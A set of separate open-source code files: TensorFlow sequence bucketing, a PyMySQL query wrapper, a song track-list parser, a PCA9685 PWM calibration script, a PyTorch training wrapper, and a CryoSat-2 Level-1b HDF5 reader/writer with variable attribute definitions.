# Because the data is read more than once by the queue,
# clear_after_read is set to False (but I can't confirm an effect).
# Because the items have different sequence lengths, infer_shape
# is set to False. The shape is then restored in the .read method.
self.table = tf.TensorArray(size=len(data),
dtype=data[0].dtype,
dynamic_size=False,
clear_after_read=False,
infer_shape=False)
# initialize table
for i, datum in enumerate(data):
self.table = self.table.write(i, datum)
# set up the inferred element shape
self.element_shape = tf.TensorShape((None,) + data[0].shape[1:])
def read(self, index):
# read index from table and restore the inferred shape
read = self.table.read(index)
read.set_shape(self.element_shape)
return read
def shuffle_bucket_batch(input_length, tensors, shuffle=True, **kwargs):
# bucket_by_sequence_length requires the input_length and tensors
# arguments to be queues. Use a range_input_producer queue to shuffle
# an index for sliceing the input_length and tensors laters.
# This strategy is idendical to the one used in slice_input_producer.
table_index = tf.train.range_input_producer(
int(input_length.get_shape()[0]), shuffle=shuffle
).dequeue()
# the first argument is the sequence length specifed in the input_length
# I did not find a ue for it.
_, batch_tensors = tf.contrib.training.bucket_by_sequence_length(
input_length=tf.gather(input_length, table_index),
tensors=[tensor.read(table_index) for tensor in tensors],
**kwargs
)
return tuple(batch_tensors)
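# Editor's note (added commentary, not in the original file): bucket_by_sequence_length groups
# examples whose input_length falls between consecutive bucket_boundaries, so each batch mixes
# only similarly-sized sequences, and with dynamic_pad=True (see test_main below) every tensor
# is padded only to the longest sequence within its own batch rather than a global maximum.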
def test_main():
# these values specify the length of the sequence and this controls how
# the data is bucketed. The value is not required to be the actual length,
# which matters when pairs of sequences have different lengths and there is no
# single true length. In that case just specify a value that gives the best performance,
# for example "the max length".
length_table = tf.constant([2, 4, 3, 4, 3, 5], dtype=tf.int32)
source_table = SequenceTable([
np.asarray([3, 4], dtype=np.int32),
np.asarray([2, 3, 4], dtype=np.int32),
np.asarray([1, 3, 4], dtype=np.int32),
np.asarray([5, 3, 4], dtype=np.int32),
np.asarray([6, 3, 4], dtype=np.int32),
np.asarray([3, 3, 3, 3, 3, 3], dtype=np.int32)
])
target_table = SequenceTable([
np.asarray([9], dtype=np.int32),
np.asarray([9, 3, 4, 5], dtype=np.int32),
np.asarray([9, 3, 4], dtype=np.int32),
np.asarray([9, 3, 4, 6], dtype=np.int32),
np.asarray([9, 3], dtype=np.int32),
np.asarray([9, 3, 3, 3, 3, 3, 2], dtype=np.int32)
])
source_batch, target_batch = shuffle_bucket_batch(
length_table, [source_table, target_table],
batch_size=2,
# bucket_boundaries divides sequences into buckets: [len < 3, 3 <= len < 5, 5 <= len]
bucket_boundaries=[1, 3, 5],
# this will pad the source_batch and target_batch independently
dynamic_pad=True,
capacity=2
)
with tf.Session() as sess:
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess, coord)
for i in range(6):
source, target = sess.run((source_batch, target_batch))
print('source_output[{}]'.format(i))
print(source)
print('target_output[{}]'.format(i))
print(target)
print('')
coord.request_stop()
coord.join(threads)
if __name__ == "__main__":
test_main() |
the-stack_106_23864 | # a cursor is the object we use to interact with the database
import pymysql.cursors
# this class will give us an instance of a connection to our database
class MySQLConnection:
def __init__(self, db):
# change the user and password as needed
connection = pymysql.connect(host = 'localhost',
user = 'root',
password = 'root',
db = db,
charset = 'utf8mb4',
cursorclass = pymysql.cursors.DictCursor,
autocommit = True)
# establish the connection to the database
self.connection = connection
# the method to query the database
def query_db(self, query, data=None):
with self.connection.cursor() as cursor:
try:
query = cursor.mogrify(query, data)
print("Running Query:", query)
cursor.execute(query)
if query.lower().find("insert") >= 0:
# INSERT queries will return the ID NUMBER of the row inserted
self.connection.commit()
return cursor.lastrowid
elif query.lower().find("select") >= 0:
# SELECT queries will return the data from the database as a LIST OF DICTIONARIES
result = cursor.fetchall()
return result
else:
# UPDATE and DELETE queries will return nothing
self.connection.commit()
except Exception as e:
# if the query fails the method will return FALSE
print("Something went wrong", e)
return False
finally:
# close the connection
self.connection.close()
# connectToMySQL receives the database we're using and uses it to create an instance of MySQLConnection
def connectToMySQL(db):
return MySQLConnection(db)
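# Illustrative usage (editor's sketch; the table and column names are invented, not from this project):
# mysql = connectToMySQL('users_db')
# new_id = mysql.query_db(
#     "INSERT INTO users (first_name, last_name) VALUES (%(fn)s, %(ln)s);",
#     {'fn': 'Ada', 'ln': 'Lovelace'})
# users = connectToMySQL('users_db').query_db("SELECT * FROM users;")
# Note that query_db closes the connection in its finally block, so create a fresh
# connectToMySQL(...) instance for each query.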
|
the-stack_106_23866 | import os
ALBUM_FIELD = "ALBUM: "
ARTIST_FIELD = "ARTIST: "
URL_FIELD = "URL: "
SEPARATOR_FIELD = "SEPARATOR: "
FORMAT_FIELD = "FORMAT: "
TIME_TITLE_TYPE = "TIME->TITLE"
TITLE_TIME_TYPE = "TITLE->TIME"
class SongsInfoReader:
track_list_file = ""
def __init__(self, track_list_file: str):
self.track_list_file = track_list_file
self.youtube_link = ""
self.artist = ""
self.album = ""
self.separator = ""
self.is_format_time_title = True
self.directory = ""
self.song_info_list = []
def read(self):
with open(self.track_list_file, "r") as file:
try:
self.youtube_link = file.readline().split(URL_FIELD)[1].strip("\n")
self.artist = file.readline().split(ARTIST_FIELD)[1].strip("\n")
self.album = file.readline().split(ALBUM_FIELD)[1].strip("\n")
self.separator = file.readline().split(SEPARATOR_FIELD)[1].strip("\n").strip("\"")
format_time_title = file.readline().split(FORMAT_FIELD)[1].strip("\n")
if format_time_title != TIME_TITLE_TYPE and format_time_title != TITLE_TIME_TYPE:
raise ValueError
self.is_format_time_title = format_time_title == TIME_TITLE_TYPE
except (ValueError, IndexError):
raise ValueError("Invalid header input")
self.directory = os.path.dirname(os.path.realpath(__file__)) + "/" + self.artist + " - " + self.album
file.readline()
lines = file.readlines()
for item in lines:
param1, param2 = item.strip("\n").split(self.separator)
if self.is_format_time_title:
time = param1
title = param2
else:
time = param2
title = param1
self.song_info_list.append(SongInfo(title, time))
if len(self.song_info_list) == 0:
raise ValueError("Invalid songs information input")
for index, item in enumerate(self.song_info_list):
if isinstance(item, list) and len(item) != 2:
raise ValueError("Invalid songs information input for {} at index {}".format(item, index))
class SongInfo:
def __init__(self, title: str, time: str):
self.title = title
self.time = time
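# Editor's sketch of the expected track-list file, inferred from the parser above
# (the field values are invented for illustration):
#
# URL: https://www.youtube.com/watch?v=XXXXXXXXXXX
# ARTIST: Some Artist
# ALBUM: Some Album
# SEPARATOR: " - "
# FORMAT: TIME->TITLE
# <one line is skipped here before the track list>
# 00:00 - First Song
# 03:45 - Second Song
#
# The header lines must appear in this order; each song line is split on the separator,
# with the time first when FORMAT is TIME->TITLE and the title first for TITLE->TIME.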
|
the-stack_106_23867 | # This advanced example can be used to compute a more precise reference_clock_speed. Use an
# oscilloscope or logic analyzer to measure the signal frequency and type the results into the
# prompts. At the end it'll give you a more precise value around 25 mhz for your reference clock
# speed.
import time
from board import SCL, SDA
import busio
# Import the PCA9685 module.
from adafruit_pca9685 import PCA9685
# Create the I2C bus interface.
i2c_bus = busio.I2C(SCL, SDA)
# Create a simple PCA9685 class instance.
pca = PCA9685(i2c_bus)
# Set the PWM frequency to 100hz.
pca.frequency = 100
input("Press enter when ready to measure default frequency.")
# Set the PWM duty cycle for channel zero to 50%. duty_cycle is 16 bits to match other PWM objects
# but the PCA9685 will only actually give 12 bits of resolution.
print("Running with default calibration")
pca.channels[0].duty_cycle = 0x7FFF
time.sleep(1)
pca.channels[0].duty_cycle = 0
measured_frequency = float(input("Frequency measured: "))
print()
pca.reference_clock_speed = pca.reference_clock_speed * (
measured_frequency / pca.frequency
)
# Set frequency again so we can get closer. Reading it back will produce the real value.
pca.frequency = 100
input("Press enter when ready to measure coarse calibration frequency.")
pca.channels[0].duty_cycle = 0x7FFF
time.sleep(1)
pca.channels[0].duty_cycle = 0
measured_after_calibration = float(input("Frequency measured: "))
print()
reference_clock_speed = measured_after_calibration * 4096 * pca.prescale_reg
print("Real reference clock speed: {0:.0f}".format(reference_clock_speed))
|
the-stack_106_23868 | import torch
from torch import cuda
from torch.nn import Module
from torch.optim.optimizer import Optimizer
from torch.utils.data.dataloader import DataLoader
from . import BaseTrainer
class StickModel(Module):
def __init__(
self,
model: Module,
loss_fn,
optimizer: Optimizer,
trainer: BaseTrainer,
device: torch.device = torch.device("cuda" if cuda.is_available() else "cpu")
):
super().__init__()
self.model = model
self.loss_fn = loss_fn
self.optimizer = optimizer
self.trainer = trainer
self.device = device
self.model.to(device)
def forward(self, x):
return self.model(x)
def fit(self, epochs, data_loader, test_loader):
self.trainer.fit(self, epochs, data_loader, test_loader)
def evaluate(self, data_loader):
self.trainer.evaluate(self, data_loader)
def data_loader_factory(
dataset, test_dataset, epochs=20, batch_size=1, shuffle=False, sampler=None,
batch_sampler=None, num_workers=0, collate_fn=None,
pin_memory=False, drop_last=False, timeout=0,
worker_init_fn=None, multiprocessing_context=None
):
loader_config = {'batch_size': batch_size,
'shuffle': shuffle,
'sampler': sampler,
'batch_sampler': batch_sampler,
'num_workers': num_workers,
'collate_fn': collate_fn,
'pin_memory': pin_memory,
'drop_last': drop_last,
'timeout': timeout,
'worker_init_fn': worker_init_fn,
'multiprocessing_context': multiprocessing_context
}
data_loader = DataLoader(dataset=dataset, **loader_config)
test_loader = DataLoader(dataset=test_dataset, **loader_config)
return epochs, data_loader, test_loader
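# Editor's usage sketch (train_ds, test_ds, my_net, my_trainer are hypothetical placeholders;
# only StickModel and data_loader_factory from this module are assumed):
# epochs, train_dl, test_dl = data_loader_factory(train_ds, test_ds, epochs=10, batch_size=32, shuffle=True)
# stick = StickModel(model=my_net, loss_fn=torch.nn.CrossEntropyLoss(),
#                    optimizer=torch.optim.Adam(my_net.parameters()), trainer=my_trainer)
# stick.fit(epochs, train_dl, test_dl)
# stick.evaluate(test_dl)
# Here train_ds/test_ds are torch Datasets, my_net is an nn.Module and my_trainer implements
# the BaseTrainer fit()/evaluate() interface imported at the top of this file.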
|
the-stack_106_23869 | #!/usr/bin/env python
u"""
HDF5_cryosat_L1b.py (08/2020)
Reads and Writes HDF5 files for CryoSat-2 Level-1b data products
Supported CryoSat Modes: LRM, SAR, SARin, FDM, SID, GDR
OUTPUTS a formatted HDF5 file with:
Location: Time and Orbit Group
Data: Measurements Group
Geometry: External Corrections Group
Waveform_1Hz: Average Waveforms Group
Waveform_20Hz: Waveforms Group (with SAR/SARIN Beam Behavior Parameters)
METADATA: MPH, SPH and DSD Header data
OPTIONS:
BASELINE (HDF5_cryosat_L1b): CryoSat-2 baseline (A, B, C)
FILENAME (HDF5_cryosat_L1b): output HDF5 file name
TITLE (HDF5_cryosat_L1b): output file description
HEADER (HDF5_cryosat_L1b): output CryoSat-2 file headers (MPH, SPH, DSD)
1: for single CryoSat-2 files
2: for merged CryoSat-2 files from convert_cryosat_L1b.py
CLOBBER (HDF5_cryosat_L1b): overwrite existing HDF5 file
VERBOSE: print HDF5 structure parameters to screen
ATTRIBUTES (read_HDF5_cryosat_L1b): input variable attributes from HDF5 file
PYTHON DEPENDENCIES:
numpy: Scientific Computing Tools For Python (https://numpy.org)
h5py: Python interface for Hierarchal Data Format 5 (HDF5)
(https://www.h5py.org/)
UPDATE HISTORY:
Updated 08/2020: flake8 updates for python3
Updated 02/2020: convert from hard to soft tabulation
Updated 10/2019: changing Y/N flags to True/False
Updated 09/2019: updates for Baseline D
Updated 04/2019: print HDF5 keys from list for python3 compatibility
Updated 06/2018: use items instead of iteritems for python3 compatibility
Updated 05/2016: using __future__ print function
Updated 04/2016: fixed read attributes for Beam Behavior Parameters
Written 03/2016
"""
from __future__ import print_function
import os
import re
import h5py
#-- PURPOSE: write CryoSat-2 HDF5 files
def HDF5_cryosat_L1b(CS_l1b_mds, MODE, BASELINE, FILENAME='', TITLE='',
HEADER=0, CLOBBER=True, VERBOSE=False):
#-- setting HDF5 clobber attribute
if CLOBBER:
clobber = 'w'
else:
clobber = 'w-'
#-- getting HDF5 dataset attributes for each variable
CS_l1b_attrib = cryosat_L1b_attributes(MODE, BASELINE)
#-- open output HDF5 file
fileID = h5py.File(os.path.expanduser(FILENAME), clobber)
#-- create sub-groups within HDF5 file
fileID.create_group('Location')
fileID.create_group('Data')
fileID.create_group('Geometry')
fileID.create_group('Waveform_1Hz')
fileID.create_group('Waveform_20Hz')
#-- for SAR and SARIN modes: add subgroup for Beam Behavior Parameters
#-- within Waveform_20Hz group
if MODE in ('SAR','SIN'):
fileID['Waveform_20Hz'].create_group('Beam')
#-- Dimensions of parameters
n_records,n_blocks = CS_l1b_mds['Location']['Day'].shape
n_1Hz_wfm = CS_l1b_mds['Waveform_1Hz']['Waveform'].shape[1]
n_20Hz_wfm = CS_l1b_mds['Waveform_20Hz']['Waveform'].shape[2]
#-- find keys to output (do not output empty Spares variables)
Location_keys = [key for key in CS_l1b_mds['Location'].keys() if not
re.search('Spare',key)]
Data_keys = [key for key in CS_l1b_mds['Data'].keys() if not
re.search('Spare',key)]
Geometry_keys = [key for key in CS_l1b_mds['Geometry'].keys() if not
re.search('Spare',key)]
Wfm_1Hz_keys = [key for key in CS_l1b_mds['Waveform_1Hz'].keys() if not
re.search('Spare',key)]
Wfm_20Hz_keys = [key for key in CS_l1b_mds['Waveform_20Hz'].keys() if not
re.search('Spare',key)]
if MODE in ('SAR','SIN'):
beam_keys = [key for key in CS_l1b_mds['Waveform_20Hz']['Beam'].keys()
if not re.search('Spare',key)]
#-- create HDF5 records
h5 = {}
h5['Location'] = {}
h5['Data'] = {}
h5['Geometry'] = {}
h5['Waveform_1Hz'] = {}
h5['Waveform_20Hz'] = {}
#-- CryoSat-2 Time and Orbit Group
for key in Location_keys:
val = CS_l1b_mds['Location'][key]
if key in ('Sat_velocity','Real_beam','Baseline'):
#-- Defining the HDF5 dataset variables
h5['Location'][key] = fileID.create_dataset('Location/{0}'.format(key),
(n_records,n_blocks,3,), data=val, dtype=val.dtype,
compression='gzip')
#-- attach dimensions
h5['Location'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Location'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
h5['Location'][key].dims[2].label='CS_L1b_MDS_VECTOR_SIZE'
else:
#-- Defining the HDF5 dataset variables
h5['Location'][key] = fileID.create_dataset('Location/{0}'.format(key),
(n_records,n_blocks,), data=val, dtype=val.dtype,
compression='gzip')
#-- attach dimensions
h5['Location'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Location'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Location'][key].items():
h5['Location'][key].attrs[att_name] = att_val
#-- CryoSat-2 Measurement Group
#-- Derived from instrument measurement parameters
for key in Data_keys:
val = CS_l1b_mds['Data'][key]
#-- Defining the HDF5 dataset variables
h5['Data'][key] = fileID.create_dataset('Data/{0}'.format(key),
(n_records,n_blocks,), data=val, dtype=val.dtype, compression='gzip')
#-- attach dimensions
h5['Data'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Data'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Data'][key].items():
h5['Data'][key].attrs[att_name] = att_val
#-- CryoSat-2 External Corrections Group
for key in Geometry_keys:
val = CS_l1b_mds['Geometry'][key]
#-- Defining the HDF5 dataset variables
h5['Geometry'][key] = fileID.create_dataset('Geometry/{0}'.format(key),
(n_records,), data=val, dtype=val.dtype, compression='gzip')
#-- attach dimensions
h5['Geometry'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Geometry'][key].items():
h5['Geometry'][key].attrs[att_name] = att_val
#-- CryoSat-2 Average Waveforms Group
for key in Wfm_1Hz_keys:
val = CS_l1b_mds['Waveform_1Hz'][key]
if key in ('Waveform'):
#-- Defining the HDF5 dataset variables
h5['Waveform_1Hz'][key] = fileID.create_dataset('Waveform_1Hz/{0}'.format(key),
(n_records,n_1Hz_wfm), data=val, dtype=val.dtype,
compression='gzip')
#-- attach dimensions
h5['Waveform_1Hz'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Waveform_1Hz'][key].dims[1].label='CS_L1b_MDS_1Hz_WAVEFORM_SIZE'
else:
#-- Defining the HDF5 dataset variables
h5['Waveform_1Hz'][key] = fileID.create_dataset('Waveform_1Hz/{0}'.format(key),
(n_records,), data=val, dtype=val.dtype, compression='gzip')
#-- attach dimensions
h5['Waveform_1Hz'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Waveform_1Hz'][key].items():
h5['Waveform_1Hz'][key].attrs[att_name] = att_val
#-- CryoSat-2 Waveforms Group with Beam Behavior Parameters
for key in Wfm_20Hz_keys:
val = CS_l1b_mds['Waveform_20Hz'][key]
if key in ('Waveform','Coherence','Phase_diff'):
#-- Defining the HDF5 dataset variables
h5['Waveform_20Hz'][key] = fileID.create_dataset('Waveform_20Hz/{0}'.format(key),
(n_records,n_blocks,n_20Hz_wfm,), data=val, dtype=val.dtype,
compression='gzip')
#-- attach dimensions
h5['Waveform_20Hz'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Waveform_20Hz'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
h5['Waveform_20Hz'][key].dims[2].label='CS_L1b_MDS_20Hz_WAVEFORM_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Waveform_20Hz'][key].items():
h5['Waveform_20Hz'][key].attrs[att_name] = att_val
elif key in ('Beam'):
h5['Waveform_20Hz'][key] = {}
for ds_name in beam_keys:
ds_val = val[ds_name]
#-- Defining the HDF5 dataset variables
h5['Waveform_20Hz'][key][ds_name] = fileID.create_dataset(
'Waveform_20Hz/{0}/{1}'.format(key,ds_name), (n_records,n_blocks,),
data=ds_val, dtype=ds_val.dtype, compression='gzip')
#-- attach dimensions
h5['Waveform_20Hz'][key][ds_name].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Waveform_20Hz'][key][ds_name].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Waveform_20Hz'][key][ds_name].items():
h5['Waveform_20Hz'][key][ds_name].attrs[att_name] = att_val
else:
#-- Defining the HDF5 dataset variables
h5['Waveform_20Hz'][key] = fileID.create_dataset('Waveform_20Hz/{0}'.format(key),
(n_records,n_blocks,), data=val, dtype=val.dtype, compression='gzip')
#-- attach dimensions
h5['Waveform_20Hz'][key].dims[0].label='CS_L1b_MDS_REC_SIZE'
h5['Waveform_20Hz'][key].dims[1].label='CS_L1b_MDS_BLOCK_SIZE'
#-- add HDF5 variable attributes
for att_name,att_val in CS_l1b_attrib['Waveform_20Hz'][key].items():
h5['Waveform_20Hz'][key].attrs[att_name] = att_val
#-- output MPH/SPH/DSD headers as group attributes
if (HEADER == 1):
#-- HEADER 1 is for single CryoSat-2 files
fileID.create_group('METADATA')
fileID['METADATA'].create_group('MPH')
fileID['METADATA'].create_group('SPH')
fileID['METADATA'].create_group('DSD')
#-- Main Product Header (MPH) are all strings
for att_name,att_val in CS_l1b_mds['METADATA']['MPH'].items():
fileID['METADATA']['MPH'].attrs[att_name] = att_val
#-- Specific Product Header (SPH) are both strings and dictionaries
for att_name,att_val in CS_l1b_mds['METADATA']['SPH'].items():
if isinstance(att_val,dict):
#-- if att_val is dictionary
fileID['METADATA']['SPH'].create_group(att_name)
for ds_name,ds_val in att_val.items():
fileID['METADATA']['SPH'][att_name].attrs[ds_name] = ds_val
elif isinstance(att_val,str) and att_name:
#-- if att_val is string
fileID['METADATA']['SPH'].attrs[att_name] = att_val
#-- Data Set Descriptors (DSD) are all strings
for att_name,att_val in CS_l1b_mds['METADATA']['DSD'].items():
fileID['METADATA']['DSD'].attrs[att_name] = att_val
elif (HEADER == 2):
#-- HEADER 2 is for merged CryoSat-2 files from convert_cryosat_L1b.py
fileID.create_group('METADATA')
fileID['METADATA'].create_group('MPH')
fileID['METADATA'].create_group('SPH')
fileID['METADATA'].create_group('DSD')
#-- Main Product Header (MPH) are all strings
for fi in CS_l1b_mds['METADATA']['MPH'].keys():
fileID['METADATA']['MPH'].create_group(fi)
for att_name,att_val in CS_l1b_mds['METADATA']['MPH'][fi].items():
fileID['METADATA']['MPH'][fi].attrs[att_name] = att_val
#-- Specific Product Header (SPH) are both strings and dictionaries
for fi in CS_l1b_mds['METADATA']['SPH'].keys():
fileID['METADATA']['SPH'].create_group(fi)
for att_name,att_val in CS_l1b_mds['METADATA']['SPH'][fi].items():
if isinstance(att_val,dict):
#-- if att_val is dictionary
fileID['METADATA']['SPH'][fi].create_group(att_name)
for dsn,dsv in att_val.items():
fileID['METADATA']['SPH'][fi][att_name].attrs[dsn] = dsv
elif isinstance(att_val,str) and att_name:
#-- if att_val is string
fileID['METADATA']['SPH'][fi].attrs[att_name] = att_val
#-- Data Set Descriptors (DSD) are all strings
for fi in CS_l1b_mds['METADATA']['DSD'].keys():
fileID['METADATA']['DSD'].create_group(fi)
for att_name,att_val in CS_l1b_mds['METADATA']['DSD'][fi].items():
fileID['METADATA']['DSD'][fi].attrs[att_name] = att_val
#-- output file title
fileID.attrs['description'] = TITLE
#-- Output HDF5 structure information
if VERBOSE:
print(FILENAME)
print(list(fileID.keys()))
#-- Closing the HDF5 file
fileID.close()
#-- PURPOSE: read CryoSat-2 HDF5 files
def read_HDF5_cryosat_L1b(FILENAME, ATTRIBUTES=True, VERBOSE=False):
#-- Open the HDF5 file for reading
fileID = h5py.File(os.path.expanduser(FILENAME), 'r')
#-- Output HDF5 file information
if VERBOSE:
print(fileID.filename)
print(list(fileID.keys()))
#-- allocate python dictionaries for output CS_l1b_mds variables
CS_l1b_mds = {}
CS_l1b_mds['Location'] = {}
CS_l1b_mds['Data'] = {}
CS_l1b_mds['Geometry'] = {}
CS_l1b_mds['Waveform_1Hz'] = {}
CS_l1b_mds['Waveform_20Hz'] = {}
#-- get each HDF5 variable
#-- CryoSat-2 Location Group
for key in fileID['Location'].keys():
if key in ('Sat_velocity','Real_beam','Baseline'):
CS_l1b_mds['Location'][key] = fileID['Location'][key][:,:,:]
else:
CS_l1b_mds['Location'][key] = fileID['Location'][key][:,:]
#-- CryoSat-2 Measurement Group
for key in fileID['Data'].keys():
CS_l1b_mds['Data'][key] = fileID['Data'][key][:,:]
#-- CryoSat-2 External Corrections Group
for key in fileID['Geometry'].keys():
CS_l1b_mds['Geometry'][key] = fileID['Geometry'][key][:]
#-- CryoSat-2 Average Waveform Group
for key in fileID['Waveform_1Hz'].keys():
		if key in ('Waveform',):
CS_l1b_mds['Waveform_1Hz'][key] = fileID['Waveform_1Hz'][key][:,:]
else:
CS_l1b_mds['Waveform_1Hz'][key] = fileID['Waveform_1Hz'][key][:]
#-- CryoSat-2 Waveform Group
for key in fileID['Waveform_20Hz'].keys():
if key in ('Waveform','Coherence','Phase_diff'):
CS_l1b_mds['Waveform_20Hz'][key] = fileID['Waveform_20Hz'][key][:,:,:]
		elif key in ('Beam',):
CS_l1b_mds['Waveform_20Hz'][key] = {}
for ds_name,ds_val in fileID['Waveform_20Hz'][key].items():
CS_l1b_mds['Waveform_20Hz'][key][ds_name] = ds_val[:,:]
else:
CS_l1b_mds['Waveform_20Hz'][key] = fileID['Waveform_20Hz'][key][:,:]
#-- Getting attributes of included variables
if ATTRIBUTES:
#-- allocate python dictionaries for output CS_l1b_mds attributes
CS_l1b_mds['Attributes'] = {}
CS_l1b_mds['Attributes']['Location'] = {}
CS_l1b_mds['Attributes']['Data'] = {}
CS_l1b_mds['Attributes']['Geometry'] = {}
CS_l1b_mds['Attributes']['Waveform_1Hz'] = {}
CS_l1b_mds['Attributes']['Waveform_20Hz'] = {}
#-- CryoSat-2 Location Group
for key in fileID['Location'].keys():
CS_l1b_mds['Attributes']['Location'][key] = {}
for att_name,att_val in fileID['Location'][key].attrs.items():
CS_l1b_mds['Attributes']['Location'][key][att_name] = att_val
#-- CryoSat-2 Measurement Group
for key in fileID['Data'].keys():
CS_l1b_mds['Attributes']['Data'][key] = {}
for att_name,att_val in fileID['Data'][key].attrs.items():
CS_l1b_mds['Attributes']['Data'][key][att_name] = att_val
#-- CryoSat-2 External Corrections Group
for key in fileID['Geometry'].keys():
CS_l1b_mds['Attributes']['Geometry'][key] = {}
for att_name,att_val in fileID['Geometry'][key].attrs.items():
CS_l1b_mds['Attributes']['Geometry'][key][att_name] = att_val
#-- CryoSat-2 Average Waveform Group
for key in fileID['Waveform_1Hz'].keys():
CS_l1b_mds['Attributes']['Waveform_1Hz'][key] = {}
for att_name,att_val in fileID['Waveform_1Hz'][key].attrs.items():
CS_l1b_mds['Attributes']['Waveform_1Hz'][key][att_name] = att_val
#-- CryoSat-2 Waveform Group
for key in fileID['Waveform_20Hz'].keys():
			if key in ('Beam',):
CS_l1b_mds['Attributes']['Waveform_20Hz'][key] = {}
for dsn in fileID['Waveform_20Hz'][key].keys():
CS_l1b_mds['Attributes']['Waveform_20Hz'][key][dsn] = {}
for atn,atv in fileID['Waveform_20Hz'][key][dsn].attrs.items():
CS_l1b_mds['Attributes']['Waveform_20Hz'][key][dsn][atn] = atv
else:
CS_l1b_mds['Attributes']['Waveform_20Hz'][key] = {}
for atn,atv in fileID['Waveform_20Hz'][key].attrs.items():
CS_l1b_mds['Attributes']['Waveform_20Hz'][key][atn] = atv
#-- Global attribute description
CS_l1b_mds['Attributes']['title'] = fileID.attrs['description']
#-- Closing the HDF5 file
fileID.close()
return CS_l1b_mds
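#-- PURPOSE: illustrative sketch (editorial addition, not part of the original
#-- interface) showing how the packed units documented in cryosat_L1b_attributes
#-- below can be applied to the dictionary returned by read_HDF5_cryosat_L1b.
#-- The function name and the unpacked targets (degrees, meters) are examples only.
def example_unpack_cryosat_location(CS_l1b_mds):
	#-- latitude and longitude are packed as 0.1 micro-degree (1e-7 degrees)
	lat = CS_l1b_mds['Location']['Lat']*1e-7
	lon = CS_l1b_mds['Location']['Lon']*1e-7
	#-- altitude of the satellite COG is packed in millimeters (1e-3 m)
	alt = CS_l1b_mds['Location']['Alt']*1e-3
	return (lat,lon,alt)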
#-- PURPOSE: get the number of records and number of blocks in an HDF5 file
def HDF5_cryosat_L1b_shape(FILENAME):
#-- Open the HDF5 file for reading
with h5py.File(os.path.expanduser(FILENAME), 'r') as fid:
n_records,n_blocks = fid['Location']['Day'].shape
n_1Hz_wfm = fid['Waveform_1Hz']['Waveform'].shape[1]
n_20Hz_wfm = fid['Waveform_20Hz']['Waveform'].shape[2]
return (n_records,n_blocks,n_1Hz_wfm,n_20Hz_wfm)
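#-- PURPOSE: illustrative usage sketch (editorial addition) of the read utilities
#-- defined above. The file name below is a hypothetical placeholder.
def example_read_cryosat_hdf5(FILENAME='CS_L1b_example.h5', VERBOSE=False):
	#-- query the number of records, 20Hz blocks and waveform bins in the file
	n_records,n_blocks,n_1Hz_wfm,n_20Hz_wfm = HDF5_cryosat_L1b_shape(FILENAME)
	#-- read the full L1b structure with the HDF5 variable attributes
	CS_l1b_mds = read_HDF5_cryosat_L1b(FILENAME, ATTRIBUTES=True, VERBOSE=VERBOSE)
	return CS_l1b_mds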
#-- PURPOSE: get attribute names for baseline
def cryosat_L1b_attributes(MODE, BASELINE):
#-- CryoSat-2 Time and Orbit Group
L1b_location_attributes = {}
#-- Time: day part
L1b_location_attributes['Day'] = {}
L1b_location_attributes['Day']['long_name'] = 'MDSR time stamp days'
L1b_location_attributes['Day']['units'] = 'days since 2000-01-01 00:00:00 TAI'
L1b_location_attributes['Day']['hertz'] = 20
#-- Time: second part
L1b_location_attributes['Second'] = {}
L1b_location_attributes['Second']['long_name'] = 'MDSR time stamp seconds'
L1b_location_attributes['Second']['units'] = 'seconds'
L1b_location_attributes['Second']['hertz'] = 20
#-- Time: microsecond part
L1b_location_attributes['Micsec'] = {}
L1b_location_attributes['Micsec']['long_name'] = 'MDSR time stamp microseconds'
L1b_location_attributes['Micsec']['units'] = 'microseconds'
L1b_location_attributes['Micsec']['hertz'] = 20
#-- USO correction factor
L1b_location_attributes['USO_Corr'] = {}
L1b_location_attributes['USO_Corr']['long_name'] = ('DORIS Ultra Stable '
'Oscillator drift correction factor')
L1b_location_attributes['USO_Corr']['description'] = ('USO_Corr_Factor = '
'USO_freq_nominal / (USO_freq_nominal + model_freq_deviation). '
		'USO_freq_nominal is the nominal frequency provided in the IPF database. '
'model_freq_deviation is the modelled frequency deviation provided by '
'the DORIS USO drift file')
L1b_location_attributes['USO_Corr']['units'] = '1e-15'
L1b_location_attributes['USO_Corr']['hertz'] = 20
#-- Mode ID
L1b_location_attributes['Mode_ID'] = {}
L1b_location_attributes['Mode_ID']['long_name'] = 'Mode ID'
L1b_location_attributes['Mode_ID']['description'] = ('Identifies the SIRAL '
'instrument measurement mode. See table 2.3.3-2 of the "L1b Products '
'Format Specification" document')
L1b_location_attributes['Mode_ID']['units'] = '1e-15'
L1b_location_attributes['Mode_ID']['flag_meanings'] = 'lrm sar sarin'
L1b_location_attributes['Mode_ID']['hertz'] = 20
#-- Mode Flags
L1b_location_attributes['Mode_flags'] = {}
L1b_location_attributes['Mode_flags']['long_name'] = 'Mode flags'
L1b_location_attributes['Mode_flags']['description'] = ('Flags related to '
'sub-modes of SARIn mode from instrument configuration bits in L0. '
'Identifies the sarin degraded case and the CAL4 flag')
L1b_location_attributes['Mode_flags']['flag_meanings'] = ('sarin_degraded_case '
'cal4_packet_detection')
L1b_location_attributes['Mode_flags']['hertz'] = 20
#-- Platform attitude control mode
L1b_location_attributes['Att_control'] = {}
L1b_location_attributes['Att_control']['long_name'] = 'Platform Attitude Control'
L1b_location_attributes['Att_control']['description'] = ('Platform attitude '
'control mode from instrument configuration bits in L0.')
